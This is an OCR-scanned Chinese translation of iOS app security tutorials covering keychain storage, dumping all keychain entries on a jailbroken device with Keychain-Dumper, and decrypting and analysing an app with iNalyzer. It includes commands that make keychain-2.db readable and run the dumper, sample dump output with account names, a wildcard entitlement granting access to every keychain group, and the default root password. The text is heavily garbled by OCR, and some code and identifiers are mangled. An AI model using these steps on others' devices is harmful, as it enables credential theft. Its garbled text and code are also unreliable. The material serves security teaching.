共享 信息 ， 那 么 你 需要 指定 访问 组 (access group) 。 有 同样 的 访问 组 的 应 用 能 够 访问 同样 
的 keychain 信 息 。 


KeychainltemWrapper *wrapper = [[KeychainltemWrapper alloc] initWithldentifier:@ Account 
Number" 
accessGroup:(Q YOUR APP ID HERE.com.yourcompany.GenericKeychainSuite']; 


要 把 信息 保存 到 keychain 中 ， 使 用 setObject:forKey: 方法 。 在 这 里 ，(id)kSecAttrAccount 是 
一 个 预先 定义 好 的 键 (key) ， 我 们 可 以 用 它 来 保存 账号 名 称 。 suet RNR 
的 某 类 信息 ， 在 这 里 是 一 个 通用 的 密码 。kSecValueData 可 以 被 用 来 保存 任意 的 数据 ， 在 这 

A — ANRA o 


[keychainltemWrapper setObject:kSecClassGenericPassword forKey:(id)kSecClass]; 
[wrapper setObject:@"username" forKey:(id)kSecAttrAccount]; 
[keychainltemWrapper setObject:@"password"forKey:(id )kKSecValueData]; 


[wrapper setObject:(id)kSecAttrAccessibleAlways ThisDeviceOnly forKey: 
(id)kSecAttrAccessible]; 


kSecAttrAccessiblein 变 量 用 来 指定 这 个 应 用 合适 需要 访问 这 个 数据 。 我 们 需要 对 这 个 选项 特 
别 注意 ， 并 且 使 用 最 严格 的 选项 个 键 (key) 可 needs o 


你 可 以 从 如 下 对 苹果 的 文档 的 截图 看 到 。 


Constants 

kSecAttrAccessibleAfterFirstUnlock 
The data in the keychain item cannot be accessed after a restart until the device has been unlocked once by the user. After the first unlock, the data remains accessible until the 
next restart. This is recommended for items that need to be accessed by background applications. Items with this attribute migrate to a new device when using encrypted 
backups. 


Available in iOS 4.0 and later. 
Declared in SecItem.h. 


kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly 
The data in the keychain item cannot be accessed after a restart until the device has been unlocked once by the user. After the first unlock, the data remains accessible until the 
next restart. This is recommended for items that need to be accessed by background applications. Items with this attribute do not migrate to a new device or new installation. 
Thus, after restoring from a backup, these items will not be present. 


Available in iOS 4.0 and later. 
Declared in SecItem.h. 


kSecAttrAccessibleAlways 
The data in the keychain item can always be accessed regardless of whether the device is locked. This is not recommended for application use. Items with this attribute migrate 
to a new device when using encrypted backups. 


Available in iOS 4.0 and later. 
Declared in SecItem.h. 


m 


kSecAttrAccessibleAlwaysThisDeviceOnly 
The data in the keychain item can always be accessed regardless of whether the device is locked. This is not recommended for application use. Items with this attribute do not 
migrate to a new device or new installation. Thus, after restoring from a backup, these items will not be present. 


Available in iOS 4.0 and later. 
Declared in SecItem.h. 


kSecAttrAccessibleWhenUnlocked 
The data in the keychain item can be accessed only while the device is unlocked by the user. This is recommended for items that need to be accesible only while the application 
is in the foreground. Items with this attribute migrate to a new device when using encrypted backups. 


Available in iOS 4.0 and later. 
Declared in SecItem.h. 


kSecAttrAccessibleWhenUnlockedThisDeviceOnly 
The data in the keychain item can be accessed only while the device is unlocked by the user. This is recommended for items that need to be accesible only while the application 
is in the foreground. Items with this attribute do not migrate to a new device or new installation. Thus, after restoring from a backup, these items will not be present. 


Available in iOS 4.0 and later. 
Declared in SecItem.h. 


当然 ， 我 们 应 该 绝对 不 要 使 用 AAA 。 一 个 安全 点 的 选项 是 
kSecAttrAccessibleWhenUnlocked ° 2% #14 #£ 2% 7H 2% VA ThisDeviceOnly 结尾 的 。 如 果 选 中 了 
这 个 选项 ， Minuit ning qi (key) mZ > Ase A RERIT dap B] Ra RL x 
备 看 到 。 即 使 它们 提供 了 进一步 的 安全 性 ， 使 用 它们 可 能 不 是 一 个 好 主意 ， 除 非 你 有 一 个 更 
piee ff e 


要 从 keychain 中 获取 数据 ， 可 以 用 NSString *accountName = [wrapper objectForKey: 
(id)kSecAttrAccount]; 


1& M Keychain Dumper 导 出 Keychain 中 的 数据 


从 Keychain 中 导出 数据 的 最 流行 工具 是 ptoomey3 的 Keychain dumper。 其 github 地 址 位 于 

此 。 现 在 到 这 个 地 址 把 它 下 载 下 来 。 然 后 解压 zip 文 件 。 在 解压 的 文件 夹 内 ， 我 们 感 兴 趣 的 文 
件 是 keychain_dumper 这 个 二 进 制 文件 。 一 个 应 用 能 够 访问 的 keychain 数 据 是 通过 其 
entitlements 文 件 指 定 的 。keychain dumper 使 用 一 个 自 签 名 文件 ， 带 有 一 个 * 通 配 符 的 
entitIments ， 因 此 它 能 够 访问 keychain 中 的 所 有 条 目 。 当然， 也 有 其 他 方法 来 使 得 所 有 
keychain 信 息 都 被 授权 ， 比 如 用 一 个 包含 所 有 访问 组 (access group) 的 entitlements 文 件 ， 或 
者 使 用 一 个 特定 的 访问 组 (access group) 使 得 能 够 访问 所 有 的 keychain 数 据 。 例 如 ， 工 
具 Keychain-viewer 就 使 用 如 下 的 entitlements. 


com.apple.keystore.access-keychain-keys 


com.apple.keystore.device 


现在 把 这 个 二 进 制 文件 上 传 到 你 的 设备 的 /tmp 文 件 夹 ， 确 保 它 可 执行 





Prateeks—MacBook-Pro:Documents prateekgianchandani$ sftp roota21582.158.8.181 
rootal82.158.8.1801's password: 

Connected to 192.168.8.181. 

sTtp> cd /tmp 

sTtp»- put keychain, dumper 

Uploading Keychain, dumper to /private/var/tmp/keychain dumper 

keychain dumper 10A% J5KB  25.1KB/s Be: Be 
sTtp» ^D 

Prateeks-MacBook-Pra:Dacuments prateekgianchandani$ ssh rootg1982.158.8.181 
rootalB2.158.8.181's password: 

Prateeks-iPod:- root# cd /tmp 

Prateeks-iPod:/tmp root# chmod a+x keychain dumper 

Prateeks-iPod:/tmp root# 图 


现在 请 确保 保存 在 /private/var/Keychains/keychain-2.db 的 keychain 文 件 可 以 被 读 取 。 


Prateeks-iPod:/tmp root# chmod +r /private/var/Keychains/keychain-2.db 
Prateeks-iPod:/tmp root# 


现在 ， 运 行 这 个 可 执行 文件 


Prateeks-iPod:/tmp root# ./keychain, dumper 
Generic Password 

Service: A'rPnrt 

Account: jackup 

Entitlement Group: apple 

Label: (null) 

Generic Field: (null! 

Keychain Data: 3141 


Generic Password 

Service: Apple-token-sync 

Account: prateek.searchingeyeggmail.com 

Entitlement Group: appleaccount 

Label: (null) 

Generic Field: (null) 

Keychain Data: AQAAAABPB/! NaQs= 


Generic Password 

Service: push.apple.com 

Account: 

Entitlement Group: com.apple.apsd 
Label: APSPublicTokens 

Generic Field: (null) 

Keychain Data: (null) 


Generic Password 


Service: ids 

Account: identity-rsa-public-key 
Entitlement Group: apple 

Label: (null) 

Generic Field: (null) 








Jd Label: 
€ Generic Field: OAuth 
a Keychain Data: prateek a CO Är 


(null) 


Generic Password 


EI Service: com.apple.certui 


Entitlement Group: com.apple.cfnetwork 


Label: 


Generic Field: <99aTbbece | 


(null) 
see 78 3i837d45b 8b243a75- 


Keychain Data: (null) 


Generic Password 


Service: com.apple.certui 
Account: https: mail-attachment.googleusercontent.com 一 a81b563 


iH Label: 


| Entitlement Group: com.apple.cfnetwork 


(null) 


Generic Field: <a91b563d TbT79e68 
Keychain Data: (null) 


Generic Password 


Service: «537806174 5956782e 525173655» 


= 


Label: 


Account: «54557558 63654964> 
Entitlement Group: 8WEEMEA/DD.com.spotify.client 


(null) 


Generic Field: (null! 
Keychain Data: 6566! f1B5dTfTc514 


Internet Password 


[D Server: 


smtp. gmail.com 


iW Account: prateek.searchingeyegamail.com 
m Entitlement Group: apple 


Label: 


FR 


(null) 


|I Keychain Data: imis 


Account: https: mail.google.com 一 S8S8afbbcZ2 iB37d45b 8b243a75 


8743 dBcfb57ee 56c16 


如 你 所 见 ， 它 可 以 导出 所 有 的 keychain 信 息 。 你 可 以 看 到 许多 保存 在 这 里 的 用 户 名 和 密码 。 


例如 ， 你 可 以 看 到 Mail 应 用 把 你 


找到 Acc een, 其 他 更 多 的 信息 。 上 述 命 


密码 。 你 可 以 通过 一 h 命 令 查 看 它 的 用 法 。 
Prateeks-iPod:/tmp root# ./keychain dumper -h 


Usage: Keychain dumper [-e] | [-h] | [-aanick] 
eno flags»: Dump Password Keychain Items (Generic Password, Internet Passwords) 


-a: Dump All Keychain Items (Generic Passwords, Internet Passwords, Identities, 
-e: Dump Entitlements 

-g: Dump Generic Passwords 

-n: Dump Internet Passwords 

-i: Dump Identities 

—c: Dump Certificates 

-k: Dump Keys 

Prateeks-iPod:/tmp root# [] 

你 可 以 通过 “an" 命令 导出 所 有 数据 


:账号 的 用 户 名 和 密码 保存 在 keychain 中 。 


RUR 


类 似 的 ， 你 也 可 以 
会 导出 通用 和 网 络 


Certificates, and Keys] 


ms wamp waya 
Prateeks-iPod:/tmp root# ./keychain_dumper -a 
Generic Password 

Service: ^*rPort 

Account Backup 

Entitlement woroup: apple 

Label: (null) 

Generic Field: (null! 

Keychain Data: 31415 


Generic Password 

Service: Apple-token-sync 

Account: prateek.searchingeyeggmail.com 

Entitlement Group: appleaccount 

Label: (null] 

Generic Field: (null) 

Keychain Data: AQAAL -uyWOOBwRTMaQs- 


Generic Password 

Service: push.apple.com 

Account: 

Entitlement Group: com.apple.apsd 
Label: APSPublicTokens 

Generic Field: (null) 

Keychain Data: {null} 


Generic Password 


Service: ids 
Account: identity-rsa-public-key 
Entitlement Group: apple 





使 得 keychain 中 的 数据 更 安全 的 一 个 做 法 就 是 使 用 一 个 更 强 的 口令 。 这 是 因为 对 某 些 特定 的 
保护 属性 (protection attributes) 来 说 ， 口 令 会 被 用 作 加 密 keychain 中 的 数据 。iOS 上 默认 允许 
4 位 数字 口令 (从 0-9999) ， 因 此 很 容易 被 人 在 几 分 钟 之 内 暴力 破解 。 本 系列 的 后 续 文 章 中 我 
们 会 看 看 暴力 破解 口令 。 设 置 字母 加 数字 的 密码 会 让 破解 花 更 多 的 时 间 。 一 个 合适 的 保护 局 
性 (protection attributes) 和 口令 的 组 合 会 让 keychain 的 数据 更 难 被 获取 。 


在 本 文中 ， 我 们 看 到 了 从 iOS 设 备 的 Keychain 中 导出 数据 是 多 么 的 容易 。 虽 然 在 keychain 中 保 
HAWE (credentials) 和 敏感 信息 比 NSUserDefaults= 和 plist 文 件 更 安全 ， 但 是 ， 想 要 破解 它 
也 不 难 。 


References 
Keychain-Dumper https://github.com/ptoomey3/Keychain-Dumper 
本 文 原文 是 IOS Application Security Part 12 - Dumping Keychain Data 


注 : 之 前 我 写 过 一 篇 文章 ，Keychain is not safe, 大 家 可 以 对 照 着 看 看 ， 有 的 应 用 还 是 在 
keychain F RË #43 ° $ AA AX ğkeychaint X FH KKH » ais. 
得 多 ， 只 要 我 们 注意 不 要 在 keychain 中 保存 明 密码 就 会 在 很 大 程度 上 提升 安全 


Keychain is not safe 


1 Keychain 


— Ai ok VG mobile app 都 需要 在 本 地 保存 一 些 较 为 敏感 的 数据 。 如 何 安全 的 保存 这 些 数据 就 是 一 
个 值得 深入 探讨 的 问题 。 


Mac OS 可 以 利用 Keychain 保 和 各 应 用 中 用 户 的 账号 均码 ， 让 用 户 不 用 重复 输入 ， 在 iOS 中 也 
有 Keychain， 也 可 以 在 应 用 之 间 共 享 数 据 ， 只 是 有 些 限制 ， 用 户 无 法 通过 手动 控制 。 要 在 社 
保 上 KeyChain 中 的 所 有 数据 都 以 key 一 value 的 形式 进行 存储 ， 可 以 对 其 进行 add、update ^ 
get、delete 操 作 。 


如 果 需 要 在 应 用 里 使 用 keyChain， 需 要 导入 Security.framework，Kkeychain 的 操作 接口 声明 在 
头 文 件 Secltem.h 里 。 直 接 使 用 Secltem.h 里 方法 操作 keychain， 需 要 写 的 代码 较为 复杂 ， 可 
以 使 用 已 经 封装 好 了 的 工具 类 SFHFKeychainUtils ， 

L : https://github.com/Idandersen/scifihifi-iphone/tree/master/security 


对 每 个 应 用 来 说 ，Keychain 都 有 两 个 访问 区 ， 私 有 区 和 公共 区 。 私 有 区 是 一 个 sandbox， 本 程 
序 和 存储 的 任何 数据 都 对 其 他 程序 不 可 见 。Keychain 中 保存 的 信息 是 用 app unique 签 名 了 的 ， 
默认 只 有 Él C, fi 15 13 je] = 


keychain access group 的 概念 。 
a)app 保 持 的 信息 是 用 一 个 app unique 签名 了 的 ， 默 认 只 有 自己 能 够 访问 。 


" Each application on an iOS device has a unique "application-identifier" that is 
cryptographically signed into the application before being submitted to the Apple App store. 
The keychain service restricts which data an application can access based on this identifier. 
By default, applications can only access data associated with their own application- 
identifier ° By default, when no access group is specified, the application will use the unique 
application-identifier as the access group (thus limiting access to the application itself)" 


b) 不 同 app 之 问 可 以 通过 access_group 共 享 
app157group app1.accessgroup.item1, 
app2 在 entitlements 中 加 入 这 个 item 就 可 以 访问 了 。 


c) 在 不 同 app 之 间 共 享 ， 只 能 在 同一 个 公司 内 部 的 app 共 享 
为 keychain access group 所 在 的 文件 entitlements.plist， 需 要 添加 到 
code sign entitlements. 


这 个 文件 的 路 径 要 配置 在 Project->build setting->Code Signing Entitlements € > 4 J| 2- 2c [X 
无 效 ， 配 置 好 后 ， 须 用 你 正式 的 证 书签 名 编译 才 可 通过 ， 否 则 xcode 会 弹 框 告诉 你 code 
signing 有 问题 。 所 以 ， 苹 果 限 制 了 你 只 能 同 公司 的 产品 共 至 KeyChain 数 据 ， 别 的 公司 访问 不 
了 你 公司 产品 的 KeyChain 。 


很 多 app 都 这 样 保存 用 户 冤 码 ， 可 是 ， 这 样 就 安全 了 吗 ? 


2 Keychain is not safe 


对 于 没有 越狱 的 设备 ， 上 述 做 法 确实 很 安全 。 但 是 ， 对 于 jail break 之 后 的 设备 ， 风 险 就 很 大 
Y O 


通过 上 面 的 分 析 ， 我 们 知道 要 访问 keychain 里 面 的 数据 ， 需 要 
1) 和 app 同 样 的 证 书 


jail break 相当 于 对 苹果 做 签名 检查 的 py 了 个 补丁 ， 使 得 不 是 苹果 颁发 的 证 书签 名 的 文 
件 ， 甚 至 伪造 的 签名 文件 签名 的 app 也 能 正常 使 用 。 所 以 这 个 可 以 轻松 绕 过 。 

2) 获得 access group 的 名 称 

Keychain Dumper Updated for iOS 5 介绍 了 如 何 获 得 acess group ° 


其 实 也 可 以 不 必 获 得 access group， 因 为 access 的 匹配 是 可 以 用 正则 表达 式 的 ， 也 就 是 用 * 就 
可 以 匹配 所 有 group 了 。 例子 如 下 : 


«dict» <key>keychain-access-groups</key> 
«array» <string>*</string> </array> </dict></plist> 


3) 在 设备 上 执行 2) 中 介绍 的 keychain dumper， 就 可 以 得 到 所 有 的 相关 信息 。 但 是 ， 要 在 设 
备 上 执行 keychain dumper， 就 需要 用 chmod 777 设 置 其 权限 ， 需 要 root 权 限 ， 而 jail break 之 
后 的 默认 窗 码 是 : alpine。 


最 后 可 以 获得 好 几 个 文件 ， 下 面 是 里 面 的 2 个 例子 。 (密码 都 被 我 用 password 字 串 替 换 ) 


a) 是 家 里 的 WIFI 信息 


protection, class String AfterFirstUnlock 

mdat Date Feb 26, 2013 5:31:54 AM 
acct String XXAXX 2BSBFS 

agrp String apple 

cdat Date Feb 26, 2013 5:31:54 AM 
data COD String . wifi password 

pdmn String ck 

SVECE String AirPort 


b) 是 某 知 名 微 博 


protection class String WhenUnlocked 

mdat Date Feb 26, 2013 7:47:54 AM 
acct String XX XXX account.password 
agrp String JEBOWS37H2.XXX.XXX.XXX 
cdat Date Feb 26, 2013 7:47:54 AM 
data CD String * password 

pdmn String ak 


我 在 越狱 之 后 的 iOS 5.1 的 iPhone，iPad, iOS 6.1.2 的 iPad 上 都 测试 过 ， 都 可 以 获得 如 上 信 
息 。 实 际 中 的 例子 远 不 止 这 2 个 。 很 多 应 用 都 是 直接 存 用户 的 明文 密码 的 。 


3 个 人 如 何 防 止 信息 泄露 


a) 修改 root 的 默认 密码 。 
b) 安装 能 信任 的 jail break app ° 


4 对 开发 者 和 公司 


RAR AP aD A RAG o 
Encryption is a must for sensitive data ° 


#5 iOS 应 用 静态 分 析 下 的 更 多 文章 


Des ud id) 查看 类 人 信息， 执行 运行 时 分 析 和 其 他 一 些 事情 。 基 本 上 它 把 解密 应 用 、 导 出 
类 信息 这 些 事情 自动 化 了 ， 并 且 更 好 的 展示 了 出 来 。 我 们 也 可 以 像 Cycript 那 样 挂 钧 运行 的 进 
程 。 A A AREE Labs 开 发 和 维护 ， 它 的 官方 地 址 在 这 。iNalyzer 同 时 也 已 经 开源 了 ， 
gitub 地 址 在 这 


在 用 iNalyzer 之 前 ， 有 些 依 赖 的 软件 需要 先 安装 。 请 确保 Graphviz 和 Doxygen 已 经 安装 了 ， 因 

为 没有 这 2 个 工具 ，iNalyzer 不 会 正 第 工作 。 并 且 ， 请 注意 ， 我 在 Mac OS X Mountain Lion 
10.8.4 上 做 的 测试 ， 但 是 我 们 用 最 新 版 本 的 Graphviz 的 时 候 它 经 第 会 挂 起 (hang) 。 因 此 ， 
我 下 载 了 Graphviz 的 一 个 较 老 的 版 本 (v 2.30.1) ， 并 且 这 个 老 版 本 工作 正常 。 你 可 以 在 这 找 
到 Graphviz for Mac 的 老 版 本 。 


步 就 是 在 你 的 iOS 设备 上 安装 iNalyzer。 先 到 Cydia-> 管 理 , 确保 源 http://appsec- 
ne ， 如 下 图 。 


iPod = 1:29 PM Cm 


Manage 





"4 AppSec-Labs.com > 


http://appsec-labs.com/cydia/ 


BigBoss 


http://apt.thebigboss.org/repofiles/cydia/ 





ma Cydia/Telesphoreo > 


http://apt.saunk.com 





Dev Team > 


http://repoG66.ultrasnüw.corn/ 





2 Hackulo.us > 
http://cydia.hackulo.us/ | 





; Hackulo.us Clutch > 
http://clutch.hackulo.us/ 





m iPhoneCake > 


EBEN Http: /cydiaiphonecake.com/ 





然后 到 Cydia 的 搜索 ， 搜 索 iNalyzer。 根 据 你 现在 设备 上 正在 运行 的 OS 版 本 ， 选 择 对 应 版 本 
的 INalvzer o 


iOS 24 Wiki 


iPod = 1:31 PM @ om 





& iNalyzer for iOS 4 
& iNalyzer for iOS 5.5.4b adl 


o|w|Ejn|T | Yjuj rjojP 
A|s|pirje]n 
cd zIxic|viBiNi ME 


123 & space Search 





如 你 所 见 ， 我 已 经 把 iNalyzer 安 装 好 了 。 


Details 





^ . iNalyzer for iOS 5.5.4b 


| < Change Package Settings > 





















































, Author AppSec-Labs 


iNalyzer for iOS 5 v5.5.4b 





Installed Package 


F 


| Version 5.5b 





5.4 使 用 iNalyzer 进 行 静态 分 析 


143 


现在 ssh 进 入 设备 ，， 然 后 转 到 iNalyzer 应 用 所 在 的 目录 。iNalyzer 安 装 在 /Applications 目 录 ， 
为 它 需 要 以 root 用 户 权 限 运 行 。 如 果 你 不 了 解 这 个 概念 ， 请 确保 你 读 过 本 系列 前 面 的 文 


_- 立 - 


AL Oo 








输入 ./iNalyzer 后 动 iNalyzer。 


Prateeks-iPod:/Applications/iMalyzer5.app root# ls 


CodeDirectory dox. template LogUI. 
CodeEntitlements doxMe.sh* logUI.cy 
CodeRequirements footer.htmlx logo.gif 
CodeResources helper init.cy logo.png 
CodeSignature iNalyzerx mi. py* 
Info.plist iNalyzer-Deamon.shx msgD.txtx 
Menu. sh iNalyzer5x msgR.txtx 
PkaInfa iMalyzer5.entitlements packApp. sh 
ResourceRules.plist iNalyzerS.xcent proc. Kill 
 CodeSignature/ icon.png proc.run 
com.appsec-labs.inalyzer5.Shutdown.plist  libsubjc.cy r38cb.sh 






com.appsec-labs.inalyzer5.Startup.plist listApp.shx utills.cyx 
Prateeks-iPod:/Applications/iMalyzerb5.app root# ./iMalyzer 
Prateeks-iPod:/Applications/iMalyzer5.app root# | 


现在 如 果 你 到 主屏 幕 ， 然 后 看 看 iNalyzer 应 用 图 标 ， 你 会 看 到 有 个 提醒 数字 。 这 表明 这 个 应 用 
可 以 通过 Web 接 口 访问 ， 然 后 这 个 提醒 数字 就 代表 的 是 端口 号 。 如果 你 再 次 运行 /iNalyzer ° 
那么 INalyzer 就 会 停止 。 因 此 ， 请 确保 记得 ./iNalyer 是 开启 还 是 关闭 这 个 应 用 。 


iNalyzer5 





现在 你 可 以 找到 你 的 设备 的 IP 地 址 ， 然 后 用 ip:port 的 方式 在 浏览 器 上 打开 。 这 里 端口 是 

5544,IP 地 址 是 10.0.1.23. 因 此 url 地 址 是 http://10.0.1.23:5544/。 一 旦 你 打开 这 个 页 面 ， 你 会 看 
到 如 下 图 的 界面 。 你 可 以 选择 一 个 应 用 ， 然 后 iNalyzer 就 会 准备 一 个 zip 文 件 ， 然 后 下 载 到 你 的 
系统 上 以 便 分 析 。 


iOS 4 Wiki 


Application security [=] = 


iNalyzer Packager AppSec 


How to use: 


1. Install GraphViz-Dot on PC/Laptop 
2. Install DoxyGen on PC/Laptop 
3. Choose Application from the list and click Package 


Choose application to Pack:| SelfsignedApp 


Package 
Be patient as package creation can take a while 
4. Save .zip to disk and extract 
5. Run Setup.bat(Win) or Setup.sh(Other) 





不 过 ， 我 在 这 行 这 一 步 的 时 候 却 遇 到 一 些 问 题 。 因 此 ， 我 们 将 使 用 一 个 替代 方法 来 完成 这 一 
步 。 首 先 确 保 iNalyer 正 在 运行 。 然 后 转 到 iNalyer 的 目录 下 ， 然 后 不 带 任何 参数 的 运行 
INalyer5 ° 


Prateeks-iPod:/Applications/iMalyzerb5.app root# pwd 

/Applications/iNalyzerb5.app 

Prateeks-iPod:/Applications/iMalyzer5.app root# .f/iNalyzer5 

usage: ./iNalyzerS [application name] [...] 

Applications available: 6580 379 weather AngryBirdsBlack-iPhone AngryBirdsRio 
Free AngryBirdsSpace-iPhone ATN BatteryDoctorLite BookMyShow CloudReaders De 
fcon GeoDoIt GmailHybrid iBooks McAfee Threat Alert NASA NASA TV Path Shazam 
Snapchat Spotify TED Whiteboard Wikitude WordPress 
Prateeks-iPod:/Applications/iMalyzer5.app root# E 


现在 你 可 以 看 到 一 系列 可 以 用 来 分 析 的 应 用 。 这 里 我 们 选择 Defcon 应 用 来 分 析 。 


Prateeks-iPod:/Applications/iMalyzer5.app root£ 

got params /var/mobile/Applications/25B6D9842-FCAS5-489D-AB3C-BFD638B1B4C30/Defcon.app/ Defcon.app 11 iMalyzer is iNalyzing 
Defcon... 

iMalyzer:crack binary got /var/mobile/Applications/25B5D942-FCA5-489D-AB3C-BFD5381B4C30/Defcon.app/Defcon /tmp/iNalyzers_ 
327b2245/Payload/Defcon.app/Defcon Dumping ARMV7 portion...helloooo polis? 

iMalyzer:Creating SnapShot into ClientFiles 

iNalyzer:SnapShot Done 

iMalyzer:Population Done 

iNalyzer:Dumping Headers 

iNalyzer:Patching Headers 

Compressing decrypted application (2/2].. [(s=2=2=s==sese2== ] 23%) 
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你 可 以 看 到 iNalyer 已 经 开始 工作 。 它 首先 解密 应 用 ， 找 出 对 应 的 类 信息 和 其 它 一 些 信 息 。 如 
下 图 所 示 ， 一 旦 iNalyzer 完 成 它 的 工作 ， 它 就 会 创建 一 个 ipa 文 件 ， 然 后 把 它 保存 到 下 图 高 5 
的 地 址 。 


c 





Prateeks- iPod: /Applications/iNalyzerS. app root# ./iNaly: on 

got params /var/mobile/Applications/25B6D942-FCAS5-4B898D- AB3C- BFD638184C30/Defcon. app/ Defcon.app 11 iNalyzer is iNalyzing 
Defcon... 

iMalyzer:crack binary got /var/mobile/Applications/25B85D842-FCA5-4B8D-AB3C-BFD63BlBAC3O8/Defcon.app/Defcon /tmp/iNalyzers_ 
327b2245/Payload/Defcon.app/Defcon Dumping ARMV7 portion...helloooo polis? 

iMalyzer:Creating SnapShot into ClientFiles 

iNalyzer: SnapShot Done 

iNalyzer:Population Done 

iNalyzer: Dumping Headers 

iNalyzer: Patching Headers 





Prateeks- iPod: PEE PEATE PONG EER app Eos 


现在 我 们 需要 得 到 这 个 ipa 文 件 ， 然 后 把 它 下 载 到 我 们 的 系统 上 (XAR E) 。 我 们 可 以 用 
Sftp ° 





Barese prateekgianchandani$ sftp root 
rootalB.8.1.23's password: 
Connected to 10. 8.1. 23. 





A rerne neen ey DER eera e ne EL ina to Defcon-v1.1.ipa 
/var/raat/Documents/iMalyzer/DefTcon-vi.l.ipa 1880* 1858KB 1.8MB/s Be: 81 
sTtp> 图 





一 旦 我 们 得 到 ipa 文 件 ， 把 它 后 组 名 改 为 zip， 然 后 解压 这 个 文件 。 


.DS Store 国 iTunesArtwork anal ClientFiles r ad dox.template 
|] Defcon-v1.1 H B iTunesMetadata.plist 4 Defcon € doxMe.sh 
© Defcon-v1.1.zip C] Payload 后 上 Ui footer.htmi 
- ReversingFiles > = logo.gif 


在 终端 (Terminal, 命令 行 ) 下 ， 转 到 其 内 部 的 Payload 一 > Doxygen A RF ° # TA e 






Prateeks-MacBonk- Proi- prateekgianchandani$ | cd Desktop/Dumpec 
Prateeks-MacBook-Pro:Doxygen prateekgianchandani$ Ls 
dox.template doxMe.sh footer. html logo. gif 
Prateeks-MacBook-Pro:Doxygen prateekgianchandani$ i 


你 会 看 到 有 一 个 叫做 doxMe.sh 的 shell 肢 本。 如果 你 看 看 它 的 内 容 ， 你 会 看 到 它 把 运行 
Doxygen 的 工作 自动 化 了 。 Doxygen 也 会 运行 Graphviz 来 产生 图 表 ， 结 果 会 保存 在 内 部 一 个 
叫做 html 的 文件 夹 下 。 基 本 上 ，iNalyzer 已 经 把 所 有 的 类 信息 替 我 们 保存 在 内 部 一 个 叫做 
Reversing Files 的 目录 下 了 ， 而 且 它 用 Doxygen 和 Graphviz 来 把 信息 更 友好 的 展示 出 来 了 。 
个 脚本 同时 也 会 把 新 创建 的 html 文 件 夹 内 部 的 index.html 文 件 打 开 。 





B/bin/sh 





Tu 
Tu 
Ew 
Tu 
Tu 
Tu 


现在 ， 我 们 来 运行 这 个 脚本 ， 让 iNalyzer 为 我 们 做 所 有 的 事情 





Prateeks-MacBook-Pro: Doxygen prateekgianchandani$ ./doxMe.sh 

Warning: Tag 'SYMBÜL CACHE SIZE' at line 55 of file dox.template has become obsolete. 

To avoid this warning please remove this line from your configuration Tile or upgrade it using “doxygen -u'" 
Searching for include Tiles... 

Searching for example Tiles... 

Searching for images... 

Searching for dot Tiles... 

Searching for msc Tiles... 

Searching Tor files to exclude 

Searching Tor Tiles to process... 

Searching for files in directory /lUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-v1.1/Payload/ReversingFiles 
Reading and parsing tag files 

Parsing files 

Preprocessing /lUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.l/Payload/ReversingFiles/ — 
Parsing file /lUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.l/Payload/ReversingFiles/ — 
fUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-vli.l/Payload/ReversingFiles/  iMalyzer — 
of comment while inside a @code block; check for missing @endcode tag! 

Preprocessing /lUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.l/Payload/ReversingFiles/  InfoPlist .h... 

Parsing file /Users/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.1l/Payload/ReversingFiles/ =InfoPlist__.h... 

Preprocessing /lUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.1l/Payload/ReversingFiles/ String dump .h... 

Parsing file /Users/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.1l/Payload/ReversingFiles/ String dump .h... 

Preprocessing /lUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.1l/Payload/ReversingFiles/Bio.h... 

Parsing file /lUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.l/Payload/ReversingFiles/Bio.h... 

Preprocessing /lUsers/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.l/Payload/ReversingFiles/DCl7TableMavItem.h... 


iNalyzer__.h... 
iNalyzer sh 
.h:38: warning: reached end 


Parsing file /Use 


Patching 
Patching 
Patching 
Patching 
| Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 
Patching 


lookup cache used 9885/55535 hits=2587 misses-932 


output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 
output 


finished... 


Prateeks—MacBook—-Pro:Doxyoqen prateekgianchandanis$ E 





一 旦 这 个 命 


开 的 样子 。 在 这 


时 候 使 用 firefox 浏 览 器 ， 因 为 其 器 用 起 来 可 能 会 有 问题 。 如 下 图 所 示 ， 第 一 页 给 出 了 对 


整个 应 用 的 字符 串 分 析 


file 
Tile 
file 
file 
file 
Tile 
Tile 
file 
file 
Tile 
file 
file 
file 
Tile 
file 
Tile 
file 
Tile 
file 
file 
file 
file 


rs/prateekgianchandani/Desktop/Dumped Apps/Defcon-vl.l/Payload/ReversingFiles/DCl7TableNavItem.h... 


847105 
857/105 
8567/105 
877105 
887/105 
897/105 
907/105 
917105 
82/185 
93/105 
94/105 
95/105 
96/185 
977105 
98/105 
99/105 
188/185 
181/185 
182/185 
183/185 
184/185 
185/185 


令 完 成 ，iNalyer 会 把 新 创建 的 html 文 件 夹 内 部 E o 
X 里 ， cepa 不 过 ， 这 个 工具 


a $i 成 了 SQLTeURL 4 $e 


的 开发 者 推荐 我 再 进行 运行 时 分 析 的 





Defcon. app iNalyzer Dashboard Appse 


Application security (WF ]« T3 











Related Pages | Classes | Files | Qr Searct 


Defcon.app 





> Strings analysis Strings analysis 
> ViewControllers 
Info.Plist Content Analysis of Strings found in the executable 


> Embeded Strings 


> hse SQL Strings 
URI strings 


1 1004 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
104 $http://www.apple.com/appleca/root.crl0 

1252 For credits (including art credit), surf here: http://defconapp.group6.net/credits. 

1253 For help, for any questions or to report a bug, surf here: http://defconapp.group6.net 

132 'http://www.apple.com/appleca/iphone.crl0 

2330 http: //$8&/statuses/public timeline.json 


2331 http://%@/statuses/user_timeline/%é.json 


© u CO uU A LU N 


2332 http://%@/users/show/%té.json 

